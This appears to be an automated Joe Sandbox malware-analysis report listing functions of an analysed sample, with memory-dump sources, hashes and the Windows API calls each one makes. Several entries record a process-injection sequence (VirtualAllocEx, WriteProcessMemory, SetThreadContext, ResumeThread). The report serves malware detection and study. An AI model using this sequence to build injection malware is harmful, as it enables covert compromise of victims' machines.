Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
Instruction ID: 9a99a4806531bb7c3a22d745ecfb99af66e7f37e9e8b240026d0a0466ff35157
Opcode Fuzzy Hash: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
Instruction Fuzzy Hash: 52114F31E0DB4186EA14AF19A448269BA60FB49FE1F484735EEAD47B94DF3CD5508A04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C517C40 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,00000000,00007FF64C512B25), ref: 00007FF64C517C64
CharPrevA.USER32(?,?,00000000,00007FF64C512B25), ref: 00007FF64C517C80
CharPrevA.USER32(?,?,00000000,00007FF64C512B25), ref: 00007FF64C517CA4
CharNextA.USER32(?,?,00000000,00007FF64C512B25), ref: 00007FF64C517CB8

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
Instruction ID: d117cc59584f9f52d272cac874aea3fab162d6d874a8ebc758802dda04c44a52
Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
Instruction Fuzzy Hash: 5911A762E0C68185FB193F19B50817DAF91EB59FE4F4A8271DA7E43785CF2CD4508701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C518648 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF64C518653
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF64C518672
RtlVirtualUnwind.KERNEL32 ref: 00007FF64C5186BF
__raise_securityfailure.LIBCMT ref: 00007FF64C518735

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
Instruction ID: 0ac4bfb162db692eb0f85d38d65fe930b6dc8a4783c3da10dff615f9f1eacd0e
Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
Instruction Fuzzy Hash: 7A219D35E0CB4686E618BF49E8883697BB4FB89B44F500136DAAD82764DF7EE064C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C513B40 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32 ref: 00007FF64C513B64
PeekMessageA.USER32 ref: 00007FF64C513B89
DispatchMessageA.USER32 ref: 00007FF64C513BAC
PeekMessageA.USER32 ref: 00007FF64C513BCD

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
Instruction ID: 1719be567204db7b3537c8ab4b48d06f3a40bb215af0ac7c7bbc75002c6e0812
Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
Instruction Fuzzy Hash: 45115832E1C642C7F7647F24E458A7EBE90FB95745F409131D65A82A84EF7CD158CB00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: maintainabovl.exePID: 5976, Parent PID: 1248COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	73
Total number of Limit Nodes:	5

Executed Functions

Function 04C614F7 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04C6172E

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c41e7a9ea9f24ba354a08f56d39fd00e1cecd937ad31ef0348a103337bb875c
Instruction ID: 91ee5deabbcd642ab9558e2288e811032fc87623f9735b05d716acd0edc0b5cf
Opcode Fuzzy Hash: 1c41e7a9ea9f24ba354a08f56d39fd00e1cecd937ad31ef0348a103337bb875c
Instruction Fuzzy Hash: A7915C71D002599FDB10CFA8C985BEDBBB2FF48315F098569D80AA7240DB74AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04C614F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04C6172E

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 638c0a3a43d1c7d3daaabca0e7e7f50258dd43b4b2f30a4897e0c99659f811e2
Instruction ID: 3be82ef30b08db3da95cdef14c898d9228c5b8c7e6cbc82ae3880b06ae1b285c
Opcode Fuzzy Hash: 638c0a3a43d1c7d3daaabca0e7e7f50258dd43b4b2f30a4897e0c99659f811e2
Instruction Fuzzy Hash: 5C915C71D00259DFDB10CFA8C985BEDBBB2FF48315F098569D80AA7240DB74AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02BA23A0 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02BA2461

Memory Dump Source

Source File: 00000001.00000002.498929829.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ba0000_maintainabovl.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 736b5ee036414e67ec541321e80cd0b4cf0564c97d09dc1eab8a2a6d9317d7d5
Instruction ID: b6e68f8582d31dbcc0abb0fc797e3f0b104beeb91f8b105f135f38e474506d07
Opcode Fuzzy Hash: 736b5ee036414e67ec541321e80cd0b4cf0564c97d09dc1eab8a2a6d9317d7d5
Instruction Fuzzy Hash: F7412BB9A043058FDB14CF99C448BAABBF5FF88314F29C499D519A7321D735A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04C61350 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04C613E0

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b9188978854d2d8d04136b6d5f6c4a0f29b2719da217ae2bf4b4a89835fc7b6b
Instruction ID: 9e0bf7b495331ff0c2582fd39198fdd6f7d79f640e2bb83bd27be22dbcc7a6dc
Opcode Fuzzy Hash: b9188978854d2d8d04136b6d5f6c4a0f29b2719da217ae2bf4b4a89835fc7b6b
Instruction Fuzzy Hash: 3B212A719003599FCF10CFA9C884BDEBBF5FF48314F14842AE959A7640C778A945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04C61348 Relevance: 1.6, APIs: 1, Instructions: 68
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04C613E0

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 80c581498adad972f71936c5230a8521e526e6cad036f7f80844b3e5221a96da
Instruction ID: 0ae577e77ce08de6bfdf2e71b08413c5fe87bf0d9ed4ec4adc5abac557200213
Opcode Fuzzy Hash: 80c581498adad972f71936c5230a8521e526e6cad036f7f80844b3e5221a96da
Instruction Fuzzy Hash: 042133719043498FCB10CFA9C8847DEBBF1FF48314F14842AEA59A7641DB79A945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02BA0006 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowLongW.USER32(?,?,?), ref: 02BA009D

Memory Dump Source

Source File: 00000001.00000002.498929829.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ba0000_maintainabovl.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 8c8e3c39dbdf7174f5b4b830597a566b1c87663c80972841a091ac01b561de3b
Instruction ID: 1077d35e5ccd299fcbd5a886b0ad49f440f29e0891614ed0f1e910c092c6245d
Opcode Fuzzy Hash: 8c8e3c39dbdf7174f5b4b830597a566b1c87663c80972841a091ac01b561de3b
Instruction Fuzzy Hash: 412192B58083858FDB11CFA4C859BDABFF4EF5E310F19848AD445A7652C3786844CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 04C61D38 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 04C61DB8

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4217c9c7f304b949c1f2337d16c18f2e939e7e67d693d3a60532ca596736dfc0
Instruction ID: 8e3bf69191c93500b633b6af3e94289b11cd6f5d8a2d098cd37f245312f5f70a
Opcode Fuzzy Hash: 4217c9c7f304b949c1f2337d16c18f2e939e7e67d693d3a60532ca596736dfc0
Instruction Fuzzy Hash: 6F2128B19003599FCF10CFAAC884BEEBBF5FF48314F54842AE519A7240C738A945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04C611B8 Relevance: 1.6, APIs: 1, Instructions: 63
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNEL32(?,00000000), ref: 04C61236

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 82150b41195736c2a8c1bb658f2b64d0c8ad0929e78e09d526a87835ecd988ad
Instruction ID: 8ea9deffb05f6e153926d6aee4e038b21fecc557c993fb8c1d4303dbca5e08df
Opcode Fuzzy Hash: 82150b41195736c2a8c1bb658f2b64d0c8ad0929e78e09d526a87835ecd988ad
Instruction Fuzzy Hash: E42135B1D003098FDB10DFAAC4847EEBBF5EF88324F54842AD519A7240CB78A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04C61D31 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 04C61DB8

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 81022371b05808838e47fe6ba5ab19dbacfa184be2ca34f59c6d3df630ff0473
Instruction ID: e01db6bd953e11533bcbcd4df59f723388f21cdaf75897967f5b1bbf9663baa0
Opcode Fuzzy Hash: 81022371b05808838e47fe6ba5ab19dbacfa184be2ca34f59c6d3df630ff0473
Instruction Fuzzy Hash: 052125B19003498FCB00CFA9D9807EEBBF1FF48314F15882AE519A7250CB38A945DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04C611B0 Relevance: 1.6, APIs: 1, Instructions: 60
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNEL32(?,00000000), ref: 04C61236

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: be5536cca776e263ea7e8efbd848cfc80a02b480d0d74828e48c98103276a6b9
Instruction ID: 93b3cf65ee81c944c8cdcf6aacbcd99412053c66de16b25a447f585f744d4c0a
Opcode Fuzzy Hash: be5536cca776e263ea7e8efbd848cfc80a02b480d0d74828e48c98103276a6b9
Instruction Fuzzy Hash: AA2134759002098FDB14CFA9C5847EEBBF1AF48324F14842AD519A7240CB78A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04C61290 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 04C612FE

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 727fbe5a1960c5582e2c802b63e72dc37b9e91f647bc14260a60c68a691c18be
Instruction ID: 9bfd3db01025620d7e751401056bf635b284f397a14ab6bd8a14adafa936f0cf
Opcode Fuzzy Hash: 727fbe5a1960c5582e2c802b63e72dc37b9e91f647bc14260a60c68a691c18be
Instruction Fuzzy Hash: 321179719002498FCF10CFAAC844BEFBBF5EF88324F148819E51AA7210C735A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04C61289 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 04C612FE

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 36cf799cfd75e47496c1a4c2945980bb77c42cb14a84789beb03504549188564
Instruction ID: c462bdb30abcb3920f7b055d48a1df6d7edb58727c3fdaa6ba9db6057905dd2a
Opcode Fuzzy Hash: 36cf799cfd75e47496c1a4c2945980bb77c42cb14a84789beb03504549188564
Instruction Fuzzy Hash: 45116775900249CFCF10CF99C4447EEBBF2BF88324F14881AD65AA7650CB75A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04C61068 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 04C610CA

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8ef7cb8b253f960d60f7bc269ad706ade5389acb51cfb5f3757ae860579c82a5
Instruction ID: a858654b891182e9b99a07c4e60aeb3a2e1a3c01cc43b6ab6454881326cf14a7
Opcode Fuzzy Hash: 8ef7cb8b253f960d60f7bc269ad706ade5389acb51cfb5f3757ae860579c82a5
Instruction Fuzzy Hash: 711158B19042498BCB10DFAAC4447EEFBF5AB88224F148819C519A7200CB35A945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04C61060 Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 04C610CA

Memory Dump Source

Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0611c2cdb0afea5ade8dee0c7dcf4e10258c1ab6240e4fce197d8e0e6c66074d
Instruction ID: 101f1af59c811e1d4a737b605bb4c3725915d5adf441a8e58fb87301e1c08dcb
Opcode Fuzzy Hash: 0611c2cdb0afea5ade8dee0c7dcf4e10258c1ab6240e4fce197d8e0e6c66074d
Instruction Fuzzy Hash: E41158B5D04359CBCB14DFA9D5843DEFBF1AB88324F14882AC119A7210CB75A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02BA0040 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 02BA009D

Memory Dump Source

Source File: 00000001.00000002.498929829.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ba0000_maintainabovl.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 6954ce52cf3e35ecc5bee68926041639ed1ae19fc79e363a71d08d814a3583ef
Instruction ID: 6db410179bef07a5df10b3f1dc68a1105efffabb824644adca55599670248c55
Opcode Fuzzy Hash: 6954ce52cf3e35ecc5bee68926041639ed1ae19fc79e363a71d08d814a3583ef
Instruction Fuzzy Hash: EB1115B59003498FDB20DF99D585BDEFBF8EB88324F10855AD914A3300C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA7C0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2abf3047fee1524abba74ac04250eec7054e17dce9e3bfb2839306e18ddc705
Instruction ID: b23f397d745a4821669fc3afa633e2a86e6809650178ad92d2dceee781f6ccdf
Opcode Fuzzy Hash: c2abf3047fee1524abba74ac04250eec7054e17dce9e3bfb2839306e18ddc705
Instruction Fuzzy Hash: 89A1A139E042089FCB14CF98C585A9EBBF2EF4A710F15846EE955AB751CB32AC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA370 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5cabb5c92b213a1f386c1bb481ddce2fba88e7e5591f88d7ba771318a50094b
Instruction ID: bea8ea3bf265c4d013e1d26caeedc0ee213a02292381648f9b0634ccf0d38352
Opcode Fuzzy Hash: d5cabb5c92b213a1f386c1bb481ddce2fba88e7e5591f88d7ba771318a50094b
Instruction Fuzzy Hash: 1591DE31E04219CFCB24CFA8C588A9DB7B3AF89304F25845ED919AB651DB32FD41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA355 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5ac119c1f1dedd079000f049faf2993f63b524d28789724fcbe2dc18314d13
Instruction ID: d7968c7df6bcee26f5b10aca392940d2500e65a8172718c87251ed62c4751bf3
Opcode Fuzzy Hash: cb5ac119c1f1dedd079000f049faf2993f63b524d28789724fcbe2dc18314d13
Instruction Fuzzy Hash: F5817931E00219CFCB24CFA8C588A9DB7B2FF59304F25845ED959AB651DB32ED81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA160 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6044dcca670da1f88ae5f17b7a6d87053fd145e6df4e52917ca90808d342bd89
Instruction ID: 543d1a37eb14c2e30d3cdd7ad195850ff0e3f21cf1a696abdfd1bc64a35c0c69
Opcode Fuzzy Hash: 6044dcca670da1f88ae5f17b7a6d87053fd145e6df4e52917ca90808d342bd89
Instruction Fuzzy Hash: B551F731B04259DFCB158FA4C518BE9BFF3AF4A300F1980AAD149AB262C7379D44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA7A1 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b96e7b04ec270ec222070d78d0ed040fec9497261585cc613e252d829ea39e5a
Instruction ID: 1336641ccc6988a595916635320b03dd56508ec2deb33ac70188eb93c5e67617
Opcode Fuzzy Hash: b96e7b04ec270ec222070d78d0ed040fec9497261585cc613e252d829ea39e5a
Instruction Fuzzy Hash: 4A416E39E046099FC714CF98C185AEEBBF2EF4A610F15845EE855BB751C732AC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA962 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c5f1eca05c3e3b9f01a955c13f8c90f01a01de0bc787f2abcef6cddfcf84f3
Instruction ID: 30d14b74e6f0b5931804f4e08f7bc9317052df293860b9481901cd4a57aa2351
Opcode Fuzzy Hash: a6c5f1eca05c3e3b9f01a955c13f8c90f01a01de0bc787f2abcef6cddfcf84f3
Instruction Fuzzy Hash: 63418E39E042489FCB14CF98C685A9DBBF3EF49214F25846ED851AB751CB32AD42CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA988 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 162c932cb0e50d533037399a024c6036b80dc165b2fe2fc823e0b990dc52506a
Instruction ID: 12e4eed29c9d784a774ccd51a756d92921e07ee2444b4a625995ff8059dc62e5
Opcode Fuzzy Hash: 162c932cb0e50d533037399a024c6036b80dc165b2fe2fc823e0b990dc52506a
Instruction Fuzzy Hash: E0413A39A005089FCB18CF98C685A9EB7F3EB49614F25846EE915AB710CB32AD41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA1F5 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff4443ed172c1dc3ff52fc6261f2676ee807a5a2df9ac277d54de4f61504123
Instruction ID: bf5d3f4ca5bbdd5509062000a92b0ea3a9c7143b2cff722afe11b2527795b933
Opcode Fuzzy Hash: 2ff4443ed172c1dc3ff52fc6261f2676ee807a5a2df9ac277d54de4f61504123
Instruction Fuzzy Hash: 2421A131B042699FCB14CF54C1196E9BBF2AF4A304F198499C449AB741C737AD45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA141 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: add70767c30494d0d63eb875d111cdd8c976a987178784b939bcfc040980b816
Instruction ID: f7c48fa36f9e2b8ec3a04d4906b24c487e1619bbb46e147cda95f7df665c952f
Opcode Fuzzy Hash: add70767c30494d0d63eb875d111cdd8c976a987178784b939bcfc040980b816
Instruction Fuzzy Hash: DA11DF34A04249CFEB15CF68D919BA9BBF3AF49704F04406ED105EB691CB366944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04CCA218 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa049e53ba9c8b61a949d36e630f0e7ad5f6c109232416a32753d1a1e4a13fe5
Instruction ID: 94d212c3c7ace8c0e0fbf8c3b35d4a1b140c2601d57deb0d5b03715ef91be84e
Opcode Fuzzy Hash: aa049e53ba9c8b61a949d36e630f0e7ad5f6c109232416a32753d1a1e4a13fe5
